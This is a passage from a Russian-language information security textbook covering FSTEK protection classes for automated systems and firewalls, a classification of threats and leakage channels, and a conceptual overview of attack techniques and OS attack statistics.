3Б 3А 2Б 2А 1Д 1Г 1В 1Б 1А
I. Подсистема управления доступом
Идентификация, проверка подлинности и контроль
доступа субъектов:
в систему + + + + + + + + +
к терминалам, ЭВМ, узлам сети ЭВМ, каналам свя-
+ + + + +
зи, внешним устройствам ЭВМ
к программам + + + + +
к томам, каталогам, файлам, записям, полям записей + + + + +
Управление потоками информации + + + +
II. Подсистема регистрации и учета
Регистрация и учет:
входа/выхода субъектов доступа в/из системы (узла
+ + + + + + + + +
сети)
выдачи печатных (графических) выходных докумен-
+ + + + + +
тов
запуска/завершения программ и процессов (заданий,
+ + + + +
задач)
доступа программ субъектов доступа к защищаемым
файлам, включая их создание и удаление, передачу + + + + +
по линиям и каналам связи
доступа программ субъектов доступа к терминалам,
ЭВМ, узлам сети ЭВМ, каналам связи, внешним
+ + + + +
устройствам ЭВМ, программам, томам, каталогам,
файлам, записям, полям записей
изменения полномочий субъектов доступа + + +
создаваемых защищаемых объектов доступа + + + +
Учет носителей информации + + + + + + + + +
Очистка (обнуление, обезличивание) освобождае-
мых областей оперативной памяти ЭВМ и внешних + + + + + +
накопителей
Сигнализация попыток нарушения защиты + + +
III. Криптографическая подсистема
Шифрование конфиденциальной информации + + +
Шифрование информации, принадлежащей различ-
ным субъектам доступа (группам субъектов) на раз- +
ных ключах
Использование аттестованных (сертифицированных)
+ + +
криптографических средств
IV. Подсистема обеспечения целостности
Обеспечение целостности программных средств и
+ + + + + + + + +
обрабатываемой информации
Физическая охрана средств вычислительной техни-
+ + + + + + + + +
ки и носителей информации
Наличие администратора (службы) защиты инфор-
+ + + +
мации в АС
Периодическое тестирование СЗИ НСД + + + + + + + + +
Наличие средств восстановления СЗИ НСД + + + + + + + + +
40
Классы
3Б 3А 2Б 2А 1Д 1Г 1В 1Б 1А
Использование сертифицированных средств защиты + + + + +
Обозначения:
“ + ” - требование к данному классу присутствует.
Распределение по классам защищенности

АС, АС, АС,
обрабатывающие обрабатывающие обрабатывающие
информацию с информацию с информацию с
грифом грифом «совершенно грифом «особой
«секретно» секретно» важности»
3А, 3А 3А,
2А 2А 2А,
не ниже 1В не ниже 1Б 1А
Рис. 4. Распределение АС по классам защищенности
1 пользователь Многопользовательская
в АС АС
Одинаковый Различный
уровень доступа к ресурсам АС уровень доступа субъектов к ресурсам АС
Класс
АС Одинаковый Различный уровень
уровень важности информации, обрабатываемой в АС
3Б 3А 2Б 2А 1А
1Б
Максимальный 1, 1, 1
1 (ОВ)
уровень 2 (СС) 2, 2, 1В 2
важности 3 (С) 3 3
информации, 1Г 3
обрабатываемой 1Д
в АС 4 : служебная … тайна
4 4 4
4 : персональные данные, …
Рис. 5. Минимальные требования для обработки информации ограничен-

ного распространения
41
Рассмотренные выше документы ФСТЭК России необходимо вос-
принимать как первую стадию формирования отечественных стандартов
в области информационной безопасности. На разработку этих докумен-
тов наибольшее влияние оказал критерий TCSEC ("Оранжевая книга")
однако это влияние в основном отражается в ориентированности этих
документов на защищенные системы силовых структур и в использова-
нии единой универсальной шкалы оценки степени защищенности.
Поскольку, в современных АС широко используются сетевые тех-
нологии рассмотрим показатели защищенности межсетевых экранов.
1.6.2. Показатели защищенности межсетевых экранов
В руководящем документе Гостехкомиссии России: “Руководящий

документ. Средства вычислительной техники. Межсетевые экраны. За-
щита от несанкционированного доступа к информации. Показатели за-
щищенности от несанкционированного доступа к информации” устанав-
ливается классификация межсетевых экранов (МЭ) по уровня защищен-
ности от несанкционированного доступа (НСД) к информации на базе
перечня показателей защищенности и совокупности описывающих их
требований.
Под сетями ЭВМ, распределенными автоматизированными система-
ми в данном документе понимаются соединенные каналами связи систе-
мы обработки данных, ориентированные на конкретного пользователя.
МЭ представляет собой локальное (однокомпонентное) или функ-
ционально - распределенное средство (комплекс), реализующее кон-
троль за информацией, поступающей в АС и/или выходящей из АС, и
обеспечивает защиту АС посредством фильтрации информации, т.е. ее
анализа по совокупности критериев и принятия решения о ее распро-
странении в (из) АС.
Руководящий документ разработан в дополнение к Руководящим
документам Гостехкомиссии России “Средства вычислительной техни-
ки. Защита от несанкционированного доступа к информации. Показате-
ли защищенности от несанкционированного доступа к информации” и
“Автоматизированные системы. Защита от несанкционированного до-
ступа к информации. Классификация автоматизированных систем и тре-
бования по защите информации”.
Документ предназначен для заказчиков и разработчиков МЭ, а так-
же сетей ЭВМ, распределенных автоматизированных систем с целью
использования при формулировании и реализации требований по их за-
щите от НСД к информации.
42
Данные показатели содержат требования к средствам защиты, обеспе-
чивающим безопасное взаимодействие сетей ЭВМ, АС посредством управ-
ления межсетевыми потоками информации и реализованных в виде МЭ.
Показатели защищенности применяются к МЭ для определения
уровня защищенности, который они обеспечивают при межсетевом вза-
имодействии. Конкретные перечни показателей определяют классы за-
щищенности МЭ.
Деление МЭ на соответствующие классы по уровням контроля
межсетевых информационных потоков с точки зрения защиты информа-
ции необходимо в целях разработки и применения обоснованных и эко-
номически оправданных мер по достижению требуемого уровня защиты
информации при взаимодействии ЭВМ, АС. Дифференциация подхода к
выбору функций защиты в МЭ определяется АС, для защиты которой
применяется данный экран.
Устанавливается пять классов защищенности МЭ.
Каждый класс характеризуется определенной минимальной сово-
купностью требований по защите информации.
Самый низкий класс защищенности - пятый, применяемый для без-
опасного взаимодействия АС класса 1Д с внешней средой, четвертый -
для 1Г, третий - 1В, второй - 1Б, самый высокий - первый, применяемый
для безопасного взаимодействия АС класса 1А с внешней средой
Требования, предъявляемые к МЭ, не исключают требований,
предъявляемых к средствам вычислительной техники (СВТ) и АС в со-
ответствии с руководящими документами Гостехкомиссии России
“Средства вычислительной техники. Защита от несанкционированного
доступа к информации. Показатели защищенности от несанкциониро-
ванного доступа к информации” и “Автоматизированные системы. За-
щита от несанкционированного доступа к информации. Классификация
автоматизированных систем и требования по защите информации”
При включении МЭ в АС определенного класса защищенности,
класс защищенности совокупной АС, полученной из исходной путем
добавления в нее МЭ, не должен понижаться.
Для АС класса 3Б, 2Б должны применяться МЭ не ниже 5 класса.
Для АС класса 3А, 2А в зависимости от важности обрабатываемой
информации должны применяться МЭ следующих классов:
 при обработке информации с грифом “секретно” - не ниже 3 класса;
 при обработке информации с грифом “совершенно секретно” - не
ниже 2 класса;
43
 при обработке информации с грифом “особой важности” - не ниже
1 класса.
Таким образом, фактически, обмен информацией, составляющей
государственную тайну, между автоматизированными системами клас-
сов 1Д - 1А или при наличии такой системы только на одном конце,
данным документом не предусмотрен.
К недостаткам руководящих документов ФСТЭК России следует
отнести: ориентация на противодействие НСД и отсутствие требований
к адекватности реализации политики безопасности. Отсутствие требова-
ний к защите от угроз работоспособности. Понятие "политика безопас-
ности" трактуется исключительно как поддержание режима секретности
и отсутствие НСД [28]. Из-за этого средства защиты ориентируются
только на противодействие внешним угрозам, а к структуре самой си-
стемы и ее функционированию не предъявляется четких требований.
Ранжирование требований по классам защищенности по сравнению с
остальными стандартами информационной безопасности максимально
упрощено и сведено до определения наличия или отсутствия заданного
набора механизмов защиты, что существенно снижает гибкость требо-
ваний и возможность их практического применения.
Несмотря на указанные недостатки, документы ФСТЭК России за-
полнили "правовой вакуум" в области стандартов информационной без-
опасности в России и оперативно решили проблему проектирования и
оценки качества защищенных АС.
1.7. Классификация угроз безопасности информации

Нарушение безопасности информации возможно как вследствие
различных возмущающих воздействий, в результате которых происхо-
дит уничтожение (модификация) данных или создаются каналы утечки
данных, так и вследствие использования нарушителем каналов утечки
данных[22].
Воздействия, в результате которых может быть нарушена безопас-
ность данных, включают в себя:
 случайные воздействия природной среды (ураган, землетрясение, по-
жар, наводнение и т.п. – отключение питания, помехи в линии связи);
 целенаправленные воздействия нарушителя (шпионаж, разрушение
компонентов АC, использование прямых каналов утечки данных);
 внутренние возмущающие факторы (отказы аппаратуры, ошибки в
математическом и программном обеспечении, недостаточная профес-
сиональная и морально-психологическая подготовка персонала и т.д.).
44
Упрощенная классификация угроз безопасности информации и ка-
налов утечки информации представлена на рис. 6.
УГРОЗЫ БЕЗОПАСНОСТИ ИНФОРМАЦИИ
Каналы утечки
Воздействия
Косвенные Случайные
(природная среда)
Прямые
Целенаправленные
(нарушитель)
Отказы технических средств и Внутренние

программного обеспечения ( внутрисистемные)
Действия
обслуживающего
персонала
Рис. 6. Классификация угроз безопасности информации

Под каналом утечки понимается потенциальная возможность НСД,
которая обусловлена архитектурой, технологической схемой функцио-
нирования АС, а также существующей организацией работы с данными.
Уязвимые места АС, которые потенциально предоставляют нару-
шителю возможность НСД, приведены на рис.7.
Все каналы утечки данных можно разделить на косвенные и прямые.
Косвенными называются такие каналы утечки, использование которых
для НСД не требует непосредственного доступа к техническим устрой-
ствам АС. Косвенные каналы утечки возникают, например, вследствие
недостаточной изоляции помещений, просчетов в организации работы с
данными и предоставляют нарушителю возможность применения под-
слушивающих устройств, дистанционного фотографирования, перехвата
электромагнитных излучений, хищения носителей данных и производ-
ственных отходов (листингов машинных программ и др.).
45
Неисправности Сбои программных Ошибки Излучения
аппаратуры; сбои средств защиты; коммутации;
ошибки программ; излучения
средств и механизмов
защиты сбои аппаратуры;
излучения Терминал
Аппаратура связи и
Носители ЭВМ коммутации
данных Линии связи Терминал
Ошибки операторов; Незаконное
Хищение; подключение; Маскировка под
раскрытие механизмов
несанкционированн раскрытие другого
защиты; отключение пользователя;
ое копирование и механизмов защиты; содержания данных;
считывание несанкционированный анализ, изменение, ошибки в работе;
носителей данных прерывание потока раскрытие
доступ к данным данных; инициация механизмов защиты;
ложного соединения незаконное
использование
данных; копирование
данных
Рис. 7. Уязвимые места АС

Прямые каналы утечки данных требуют непосредственного доступа
к техническим средствам АС и данным. Наличие прямых каналов утечки
обусловлено недостатками технических и программных средств защиты,
ОС, СУБД, математического и программного обеспечения, а также про-
счетами в организации технологического процесса работы с данными.
Прямые каналы утечки данных позволяют нарушителю подключиться к
аппаратуре АС, получить доступ к данным и выполнить действия по
анализу, модификации и уничтожению данных.
При использовании прямых каналов утечки нарушитель может по-
лучить несанкционированный доступ к секретной информации и выпол-
нить ряд других деструктивных действий.
Несанкционированный доступ к секретной информации реализует-
ся с использованием следующих основных приемов:
“За дураком” - проникновение как в производственные помещения
(физическое), так и в электронные системы по следующей схеме:
 физическое проникновение - держа в руках предметы связанные с
работой на компьютерной технике (элементы маскировки), нужно
ожидать кого-либо, имеющего санкционированный доступ, возле
запертой двери, за которой находится предмет посягательства. Ко-
гда появляется законный пользователь, остается только войта
46
внутрь вместе с ним или попросить его помочь занести якобы не-
обходимые для работы на компьютере предметы;
 электронное проникновение - подключение компьютерного тер-
минала к каналам связи с использованием шлейфа “шнурка” в тот
момент времени, когда сотрудник кратковременно покидает свое
рабочее место, оставляя терминал или персональный компьютер в
активном режиме.
“За хвост” - преступник подключается к линии связи законного
пользователя и дожидается сигнала, обозначающего конец работы, пе-
рехватывает его на себя, а потом, когда законный пользователь заканчи-
вает активный режим, осуществляет доступ к системе. Подобными свой-
ствами обладают телефонные аппараты с функцией удержания номера
вызываемого абонентом.
“Компьютерный абордаж” - подбор вручную или с использовани-
ем автоматической программы кода доступа автоматизированной систе-
мы с использованием обычного телефонного аппарата.
“Неспешный выбор” (брешь, люк) - изучение слабых мест в защи-
те автоматизированной системы, их исследований, выявление участков
имеющих ошибки или неудачную логику программного строения, раз-
рыв программы и дополнительное введение команд.
“Маскарад” - проникновение в компьютерную систему, выдавая
себя за законного пользователя с использованием его кодов и других
идентифицирующих шифров.
Мистификация - создание условий, когда пользователь подключа-
ется к чьей-либо системе, будучи абсолютно уверенным в том, что он
работает с нужным ему абонентом. Формируя правдоподобные ответы
на запросы пользователя и поддерживая его заблуждения некоторое
время, обычно добывается коды доступа или отклик на пароль.
“Аварийный” - создание условий для возникновения сбоев или
других отклонений в работе ЭВМ, когда в компьютерном центре вклю-
чается особая программа, позволяются в аварийном режиме получать
доступ к наиболее ценным данным, как правило, в этом режиме “отклю-
чаются” все имеющиеся в системе средства защиты информации.
На основной фазе - основными приемами манипуляции данными и
управляющими программами, приводящими к движению информацион-
ных ресурсов являются:
 "Подмена данных" - изменение или введение новых данных, как
правило, при вводе-выводе информации для приписывания адрес-
ным данным “чужой” истории.
47
 “Троянский конь (матрешка, червь, бомба)” - тайное введение в
программное обеспечение специальных программ, как правило,
отчисляющих. Все манипуляции с данными производится и кон-
тролируется этой программой в определенный заданный момент
времени и при стечении благоприятных для преступника обстоя-
тельств.
 “Асинхронная атака” - используя асинхронную природу операци-
онной системы, преступник может заставить работать при ложных
условиях из-за чего управление обработкой частично или полно-
стью нарушается. Эта ситуация используется для внесения изме-
нений в операционную систему, причем в не ее эти изменения не
будут заметны.
 “Моделирование” - построение модели поведения АС в различных
условиях с целью оптимизации способа манипуляции данными и
организации движения информационных ресурсов.
“Салями” - оригинальная электронная версия методов изъятия
“лишних” денежных средств в свою пользу. При использовании этого ме-
тода злоумышленник так же, как и в предыдущем случае, “дописывает”
прикладное программное обеспечение специальным модулем, который
манипулирует с информацией, перебрасывая на подставной счет резуль-
таты округления при проведении законных транзакций. Расчет построен
на том, что отчисляемые суммы столь малы, что их потери практически
незаметны, а незаконное накопление средств проводится за счет суммы
совершения большого количества операций (ст. 272, 273,158 УК РФ).
1.8. Основные методы нарушения конфиденциальности,

целостности и доступности информации
При рассмотрении вопросов защиты АС целесообразно использо-
вать четырехуровневую градацию доступа к хранимой, обрабатываемой
и защищаемой АС информации, которая поможет систематизировать как
возможные угрозы, так и меры по их нейтрализации и парированию, т.е.
поможет систематизировать и обобщить весь спектр методов обеспече-
ния защиты, относящихся к информационной безопасности. Эти уровни
следующие:
 уровень носителей информации;
 уровень средств взаимодействия с носителем;
 уровень представления информации;
 уровень содержания информации.
48
Данные уровни были введены исходя из того, что, во-первых, ин-
формация для удобства манипулирования чаще всего фиксируется на
некотором материальном носителе, которым может быть бумага, диске-
та или что-нибудь в этом роде. Во-вторых, если способ представления
ин формации таков, что она не может быть непосредственно воспринята
человеком. Возникает необходимость в преобразователях информации в
доступный для человека способ представления. Например, для чтения
информации с дискеты необходим компьютер, оборудованный дисково-
дом соответствующего типа. В-третьих, как уже было отмечено, ин-
формация может быть охарактеризована способом своего представления
или тем, что еще называется языком в обиходном смысле. Язык жестов,
язык символов и т.п. - все это способы представления информации. В-
четвертых, человеку должен быть доступен смысл представленной ин-
формации, ее семантика.
Защита носителей информации должна обеспечивать парирование
всех возможных угроз, направленных как на сами носители, так и на за-
фиксированную на них информацию, представленную в виде изменения
состояний отдельных участков, блоков, полей носителя. Применительно
к АС защита носителей информации в первую очередь подразумевает
защиту машинных носителей. Вместе с тем, необходимо учитывать, что
носителями информации являются также каналы связи, документальные
материалы, получаемые в ходе эксплуатации АС, и т.п. Защита средств
взаимодействия с носителем охватывает спектр методов защиты про-
граммно-аппаратных средств, входящих в состав АС, таких как средства
вычислительной техники, операционная система, прикладные програм-
мы. В основном защита на данном уровне рассматривается как защита
от не санкционированного доступа, обеспечивающая разграничение до-
ступа пользователей к ресурсам системы. Защита представления инфор-
мации, т.е. некоторой последовательности символов, обеспечивается
средствами криптографической защиты. Защита содержания информа-
ции обеспечивается семантической защитой данных.
К основным направлениям реализации злоумышленником информа-
ционных угроз относятся:
 непосредственное обращение к объектам доступа;
 создание программных и технических средств, выполняющих об-
ращение к объектам доступа в обход средств защиты;
 модификация средств защиты, позволяющая реализовать угрозы
ин формационной безопасности;
 внедрение в технические средства АС программных или техниче-
49
ских механизмов, нарушающих предполагаемую структуру и
функции АС.
К числу основных методов реализации угроз информационной без-
опасности АС относятся:
 определение злоумышленником типа и параметров носителей ин-
формации;
 получение злоумышленником информации о программно-
аппаратной среде, типе и параметрах средств вычислительной
техники, типе и версии операционной системы, составе приклад-
ного программного обеспечения;
 получение злоумышленником детальной информации о функциях,
выполняемых АС;
 получение злоумышленником данных о применяемых системах за-
щиты;
 определение способа представления информации;
 определение злоумышленником содержания данных, обрабатыва-
емых в АС, на качественном уровне (применяется для мониторин-
га АС и для дешифрования сообщений);
 хищение (копирование) машинных носителей информации, со-
держащих конфиденциальные данные;
 использование специальных технических средств для перехвата
побочных электромагнитных излучений и наводок (ПЭМИН) -
конфиденциальные данные перехватываются злоумышленником
путем выделения информативных сигналов из электромагнитного
излучения и наводок по цепям питания средств вычислительной
техники, входящей в АС;
 уничтожение средств вычислительной техники и носителей ин-
формации;
 хищение (копирование) носителей информации;
 несанкционированный доступ пользователя к ресурсам АС в обход
или путем преодоления систем защиты с использованием специ-
альных средств, приемов, методов;
 несанкционированное превышение пользователем своих полномочий;
 несанкционированное копирование программного обеспечения;
 перехват данных, передаваемых по каналам связи;
 визуальное наблюдение - конфиденциальные данные считываются
с экранов терминалов, распечаток в процессе их печати и т. п.;
 раскрытие представления информации (дешифрование данных);
 раскрытие содержания информации на семантическом уровне - до-
50
ступ к смысловой составляющей информации, хранящейся в АС;
 уничтожение машинных носителей информации;
 внесение пользователем несанкционированных изменений в про-
граммно-аппаратные компоненты АС и обрабатываемые данные;
 установка и использование нештатного аппаратного и/или про-
граммного обеспечения;
 заражение программными вирусами;
 внесение искажений в представление данных, уничтожение дан-
ных на уровне представления, искажение информации при переда-
че по линиям связи, внедрение дезинформации;
 выведение из строя машинных носителей информации без уни-
чтожения информации - выведение из строя электронных блоков
накопите лей на жестких дисках и т. п.;
 проявление ошибок проектирования и разработки аппаратных и
программных компонентов АС;
 обход (отключение) механизмов защиты - загрузка злоумышленни-
ком нештатной операционной системы с дискеты, использование
отладочных режимов программно-аппаратных компонент АС и т.п.;
 искажение соответствия синтаксических и семантических конструк-
ций языка - установление новых значений слов, выражений и т. п.;
 запрет на использование информации - имеющаяся информация по
каким-либо причинам не может быть использована.
Распределение перечисленных методов реализации угроз информа-
ционной безопасности представлено в табл. 3.
Таким образом, поскольку перечисленные в табл. 3 виды угроз не
зависят от уровней доступа к информации, можно говорить, что их соче-
тание образует двумерную дискретную конечную систему координат.
Для удобства такая система может быть выражена в виде двумер-
ной таблицы, являющейся методологическим инструментом. В зависи-
мости от целей, которые ставятся специалистом по информационной
безопасности, данная таблица может описывать как основные меры по
защите АС, так и основные методы реализации угроз.
1.9. Атаки на автоматизированные системы

В общем случае программное обеспечение любой АС состоит из
трех основных компонентов: операционной системы, сетевого про-
граммного обеспечения (СПО) и системы управления базами данных
(СУБД). Поэтому все попытки взлома защиты АС можно разделить на
три группы:
51
 атаки на уровне систем управления базами данных;
 атаки на уровне операционной системы;
 атаки на уровне сетевого программного обеспечения.
1.9.1. Атаки на уровне систем управления базами данных
Защита СУБД является одной из самых простых задач. Это связано

с тем, что СУБД имеют строго определенную внутреннюю структуру, и
операции над элементами СУБД заданы довольно четко. Есть четыре
основных действия - поиск, вставка, удаление и замена элемента. Другие
операции являются вспомогательными и применяются достаточно ред-
ко. Наличие строгой структуры и четко определенных операций упро-
щает решение задачи защиты СУБД. В большинстве случаев хакеры
предпочитают взламывать защиту автоматизированной системы на
уровне операционной системы и получать доступ к файлам СУБД с по-
мощью средств операционной системы.
Таблица 3
Основные методы реализации угроз информационной безопасности

Уровень до-
ступа к ин- Угроза отказа
формации в Угроза раскры- Угроза наруше-
Угроза наруше- служб (отказа
АС тия параметров ния конфиденци-
ния целостности доступа к ин-
системы альности
формации)
Определение Хищение (копи- Уничтожение Выведение из
типа и парамет- рование) носите- машинных но- строя машин-
Носителей ин-
ров носителей лей информации. сителей инфор- ных носителей
формации
информации Перехват мации информации
ПЭМИН
Получение ин- Несанкциониро- Внесение поль- Проявление
формации о ванный доступ к зователем не- ошибок проек-
программно- ресурсам АС. санкциониро- тирования и
аппаратной Совершение ванных измене- разработки про-
Средств взаи- среде. Получе- пользователем ний в програм- граммно-
модействия с ние детальной несанкциониро- мы и данные. аппаратных
носителем информации о ванных дей- Установка и ис- компонент АС.
функциях, вы- ствий. Несанк- пользование Обход меха-
полняемых АС. ционированное нештатного про- низмов защиты
Получение дан- копирование граммного обес- АС
ных о применя- программного печения. Зара-
52
емых системах обеспечения. жение про-
защиты Перехват дан- граммными ви-
ных, передавае- русами
мых по каналам
связи
Определение Визуальное Внесение иска- Искажение со-

способа пред- наблюдение. жения в пред- ответствия син-
Представления ставления инРаскрытие пред- ставление дан- таксических и
информации формации ставления ин- ных; уничтоже- семантических
формации (де- ние данных конструкций
шифрование) языка
Определение со Раскрытие со- Внедрение дез- Запрет на ис-
держания дан- держания ин- информации пользование
Содержания
ных на каче- формации информации
информации
ственном
уровне
Однако в случае, если используется СУБД, не имеющая достаточно

надежных защитных механизмов, или плохо протестированная версия
СУБД, содержащая ошибки, или если при определении политики без-
опасности администратором СУБД были допущены ошибки, то стано-
вится вполне вероятным преодоление хакером защиты, реализуемой на
уровне СУБД. Кроме того, имеются два специфических сценария атаки
на СУБД, для защиты от которых требуется применять специальные ме-
тоды. В первом случае результаты арифметических операций над число-
выми полями СУБД округляются в меньшую сторону, а разница сумми-
руется в некоторой другой записи СУБД (как правило, эта запись содер-
жит личный счет хакера в банке, а округляемые числовые поля относят-
ся к счетам других клиентов банка). Во втором случае хакер получает
доступ к полям записей СУБД, для которых доступной является только
статистическая информация. Идея хакерской атаки на СУБД - так хитро
сформулировать запрос, чтобы множество записей, для которого соби-
рается статистика, состояло только из одной записи.
53
1.9.2. Атаки на уровне операционной системы
Защищать операционную систему, в отличие от СУБД, гораздо

сложнее. Дело в том, что внутренняя структура современных операци-
онных систем чрезвычайно сложна, и поэтому соблюдение адекватной
политики безопасности является значительно более трудной задачей.
Часто бытует мнение, что самые эффективные атаки на операционные
системы могут быть организованы только с помощью сложнейших
средств, основанных на самых последних достижениях науки и техники,
а злоумышленник должен быть программистом высочайшей квалифика-
ции. Это не совсем так.
Никто не спорит с тем, что пользователю следует быть в курсе всех
новинок в области компьютерной техники. Да и высокая квалификация -
совсем не лишнее. Однако искусство хакера состоит отнюдь не в том,
чтобы взламывать любую самую "крутую" компьютерную защиту. Нуж-
но просто суметь найти слабое место в конкретной системе защиты. При
этом простейшие методы взлома оказываются ничуть не хуже самых
изощренных, поскольку, чем проще алгоритм атаки, тем больше вероят-
ность ее завершения без ошибок и сбоев, особенно если возможности
предварительного тестирования этого алгоритма в условиях, прибли-
женных к "боевым", весьма ограничены.
Успех реализации того или иного алгоритма хакерской атаки на
практике в значительной степени зависит от архитектуры и конфигура-
ции конкретной операционной системы, являющейся объектом этой ата-
ки. Однако имеются атаки, которым может быть подвергнута практиче-
ски любая операционная система:
1. Кража пароля;
 подглядывание за пользователем, когда тот вводит пароль,
дающий право на работу с операционной системой (даже
если во время ввода пароль не высвечивается на экране
дисплея, хакер может легко узнать пароль, просто следя за
перемещением пальцев пользователя по клавиатуре);
 получение пароля из файла, в котором этот пароль был со-
хранен пользователем, не желающим затруднять себя вво-
дом пароля при подключении к сети (как правило, такой
пароль хранится в файле в незашифрованном виде);
 поиск пароля, который пользователи, чтобы не забыть, за-
писывают на календарях, в записных книжках или на обо-
ротной стороне компьютерных клавиатур (особенно часто
54
подобная ситуация встречается, если администраторы за-
ставляют пользователей применять трудно запоминаемые
пароли);
 кража внешнего носителя парольной информации (диске-
ты или электронного ключа, на которых хранится пароль
пользователя, предназначенный для входа в операционную
систему);
 полный перебор всех возможных вариантов пароля;
 подбор пароля по частоте встречаемости символов и би-
грамм, с помощью словарей наиболее часто применяемых
паролей, с привлечением знаний о конкретном пользовате-
ле - его имени, фамилии, номера телефона, даты рождения
и т. д., с использованием сведений о существовании экви-
валентных паролей, при этом из каждого класса опробует-
ся всего один пароль, что может значительно сократить
время перебора;
2. Сканирование жестких дисков компьютера (хакер последова-
тельно пытается обратиться к каждому файлу, хранимому на
жестких дисках автоматизированной системы; если объем
дискового пространства достаточно велик, можно быть
вполне уверенным, что при описании доступа к файлам и ка-
талогам администратор допустил хотя бы одну ошибку, в ре-
зультате чего все такие каталоги и файлы будут прочитаны
хакером; для сокрытия следов хакер может организовать эту
атаку под чужим, именем: например, под именем пользовате-
ля, пароль которого известен хакеру);
3. Сборка "мусора" (если средства операционной системы позво-
ляют восстанавливать ранее удаленные объекты, хакер может
воспользоваться этой возможностью, чтобы получить доступ
к объектам, удаленным другими пользователями: например,
просмотрев содержимое их "мусорных" корзин);
4. Превышение полномочий (используя ошибки в программном
обеспечении или в администрировании операционной систе-
мы, хакер получает полномочия, превышающие полномочия,
предоставленные ему согласно действующей политике без-
опасности):
- запуск программы от имени пользователя, имеющего не-
обходимые полномочия, или в качестве системной про-
граммы (драйвера, сервиса, демона и т. д.);
55
- подмена динамически загружаемой библиотеки, использу-
емой системными программами, или изменение перемен-
ных среды, описывающих путь к таким библиотекам;
- модификация кода или данных подсистемы защиты самой
операционной системы;
- отказ в обслуживании (целью этой атаки является частич-
ный или полный вывод из строя операционной системы):
- захват ресурсов (хакерская программа производит захват
всех имеющихся в операционной системе ресурсов, а затем
входит в бесконечный цикл);
- бомбардировка запросами (хакерская программа постоян-
но направляет операционной системе запросы, реакция на
которые требует привлечения значительных ресурсов ком-
пьютера);
- использование ошибок в программном обеспечении или
администрировании.
Если в программном обеспечении автоматизированной системы нет
ошибок и ее администратор строго соблюдает политику безопасности,
рекомендованную разработчиками операционной системы, то атаки всех
перечисленных типов малоэффективны. Дополнительные меры, которые
должны быть предприняты для повышения уровня безопасности, в зна-
чительной степени зависят от конкретной операционной системы, под
управлением которой работает данная компьютерная система. Тем не
менее, приходится признать, что вне зависимости от предпринятых мер
полностью устранить угрозу взлома автоматизированной системы на
уровне операционной системы невозможно. Поэтому политика обеспе-
чения безопасности должна проводиться так, чтобы, даже преодолев за-
щиту, создаваемую средствами операционной системы, хакер не смог
нанести серьезного ущерба.
Рассмотрим особенности угроз современным операционным систе-
мам.
Семейства современных ОС и общая статистика угроз
На сегодняшний день существует достаточно большая статистика
угроз ОС [28], направленных на преодоление встроенных в ОС меха-
низмов защиты, позволяющих изменить настройки механизмов безопас-
ности, обойти разграничения доступа и т.д.
Таким образом, статистика фактов несанкционированного доступа к
информации показывает, что большинство распространенных систем
56
(универсального назначения) довольно уязвимы с точки зрения безопас-
ности. И это несмотря на отчетливую тенденцию к повышению уровня
защищенности этих систем.
Здесь же необходимо отметить, что на практике современные ин-
формационные системы, предназначенные для обработки конфиденци-
альной информации, строятся уже с учетом дополнительных мер без-
опасности. А это также косвенно подтверждает изначальную уязвимость
современных ОС.
Проиллюстрируем сказанное. Для этого рассмотрим операционные
системы, фигурирующие в публикуемых списках системных и приклад-
ных ошибок, то есть ошибок, позволяющих получить несанкциониро-
ванный доступ к системе, понизить степень ее защищенности или до-
биться отказа в обслуживании (системного сбоя). Итак, вот эти операци-
онные системы:
BSDI AIX
MS Windows 9X
MS Windows NT Solaris SCO
MS Windows 2000 Sun OS IOS (Cisco)
Novell NetWare Digital Unix Linux
BSD HPUX IRIX
Общее количество известных успешных атак для различных ОС

[28], представлено в табл. 4, а их процентное соотношение для различ-
ных типов ОС — на диаграмме рис. 8.
Таблица 4
Общее количество известных успешных атак для различных ОС
Тип ОС Количество атак Тип ОС Количество атак
MS Windows
130 Linux 167
NT/2000
MS Windows 9X/ME 120 IRIX 84
BSD 64 HPUX 65
BSDI 10 AIX 42
Solaris 125 SCO 40
Sun OS 40 Novell NetWare 10
Digital Unix 25 IOS (Cisco) 7
57
Novell NetWare
1%
SCO IOS (Cisco)
4% 1%
AIX MS Windows
5% NT/2000
HPUX 14%
7%
MS Windows
9X/ME
IRIX 13%
9%
BSD
7%
Linux
18%
BSDI
1%
Digital Unix
Solaris
3%
13%
Рис. 8. Статистика соотношения угроз для различных ОС
Вследствие того, что большинство атак для операционных систем,

построенных на базе UNIX (BSD или AT&T), достаточно похожи, целе-
сообразно объединить их в одну группу. Тоже самое можно сказать и об
ОС семейства Windows. Таким образом, в дальнейшем будем рассмат-
ривать только семейства ОС:
1. UNIX.
2. MS Windows.
3. Novell NetWare.
Общее количество известных успешных атак для различных групп
ОС представлено в табл. 5, а их процентное соотношение для различных
типов ОС — на диаграмме рис.9.
Таблица 5
Общее количество известных успешных атак для различных
групп ОС
Тип ОС Количество атак
MS Windows 230
UNIX 660
Novell NetWare 10
58
MS
Novell
Window
NetWare
s
1%
26%
UNIX
73%
Рис. 9. Статистика соотношения угроз для семейств ОС

Относительно ОС Novell следует заметить, что данная ОС изна-
чально создавалась как защищенная (не универсального назначения) ОС,
основной функцией которой был защищенный файловый сервис. Это, с
одной стороны, должно было обеспечить ее более высокий уровень за-
щищенности, с другой стороны, налагало определенные ограничения по
использованию. Однако, начиная с пятой версии, данная ОС начала при-
обретать свойства универсальности (с точки зрения применяемых про-
токолов и приложений), что в какой-то мере может сказаться и на
уровне ее защищенности.
Классификация методов, лежащих в основе атак на современные
ОС, и их сравнительная статистика
Анализируя рассматриваемые атаки, все методы, позволяющие не-
санкционированно вмешаться в работу системы, можно разделить на
следующие группы:
 Позволяющие несанкционированно запустить исполняемый код.
 Позволяющие осуществить несанкционированные операции чте-
ния/записи файловых или других объектов.
 Позволяющие обойти установленные разграничения прав доступа.
 Приводящие к отказу (Denial of Service) в обслуживании (систем-
ный сбой).
 Использующие встроенные недокументированные возможно-
сти(ошибки и закладки).
 Использующие недостатки системы хранения или выбора (недо-
статочная длина) данных об аутентификации (пароли) и позволя-
59
ющие путем реверсирования, подбора или полного перебора всех
вариантов получить эти данные.
 Троянские программы.
 Прочие.
Диаграмма, представляющая собой соотношение групп атак (для
представленной выше их классификации) для ОС семейства Windows,
представлена на рис. 10, для ОС семейства UNIX — на рис. 11.
Кратко проиллюстрируем выделенные группы угроз.
35%
30%
25%
20%
15%
10%
5%
0%
Первая Вторая Третья Четвертая Пятая Шестая Седьмая Восьмая
группа группа группа группа группа группа группа группа
(исполня- (чтения/ (″троянские
(РПД) (DOS) (закладки) (пароли) (прочие)
емый код) записи) программы″)
6% 32% 4% 27% 5% 9% 12% 5%
